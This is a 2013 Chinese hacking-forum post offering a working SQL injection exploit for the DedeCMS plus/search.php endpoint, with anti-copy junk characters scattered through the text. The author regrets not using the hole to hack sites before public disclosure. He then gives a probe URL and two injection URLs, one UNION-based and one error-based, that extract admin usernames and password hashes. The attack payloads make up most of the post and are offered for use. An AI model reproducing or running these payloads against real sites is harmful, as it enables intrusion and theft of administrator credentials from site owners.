中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
' ]5 {( |1 ]) ], }& Z
! B4 y  m4 ^4 I4 K* O( C% ?" {2 A哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。, W+ ]4 T) |8 }7 c& g

( R: m/ f+ }6 H, w既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
9 y. N- R) q# U4 ?1 \& ?" O) E( X( W* K# U$ u
我一般是这样测试的:. ?( E* z/ G/ U" b, t
( b  B& |, y) a8 _/ y% b
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' E/ R4 i8 t  r. n- u/ d3 F  W0 V! m0 G  e/ A* q
转载不加作者名的没JJ7 U" [/ r" T4 @* j5 M5 t  n, i

' |5 K+ d8 {% Z1 B作者:鬼哥
3 m0 P# V/ m" w. ~! c5 D7 Y. {. t, g6 |, y

  f. K0 v( A; H
1 ~0 R' W$ f- @7 z* o9 `看结果如果提示% U4 V0 M) u) ?1 ]5 @% R6 r# j
9 n6 k$ C" G$ w. P& `0 C) |, h
Safe Alert: Request Error step 2 !
) r" y2 [  |* K4 M2 C5 N2 N. u9 Y& p* ^3 _. \
那么直接用下面的exp5 x. V- j( H* S# N9 k' }' l/ Z
% z: G3 I7 @/ R' t6 G6 @0 y- [
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a) `2 a+ i, y5 d; @# x3 Y
% `- m2 d: s' P/ @
4 W9 b& o5 D+ H! B
看结果如果提示/ P- l. o0 M) O1 X) E0 ]7 q
, `  H; Q/ V, F
Safe Alert: Request Error step 1 !2 U5 ~: X* z- [+ x- |
4 R; E3 C$ y1 s( H: U+ I5 |% Q4 ~7 u. y$ O
那么直接用下面的exp4 r, L7 \5 c6 ?# A1 C6 D& s
# _/ A* D8 {) y7 P; p
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a( o6 `7 d) X2 l; s

) O# ^+ j) b/ O2 S' b. A8 P/ I7 j9 c5 \! c4 c' }! B
如果正常显示证明漏洞不存在了。
; B5 R" g4 p1 s$ [* k; c; S7 i( b9 l5 |3 V1 h' D
转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2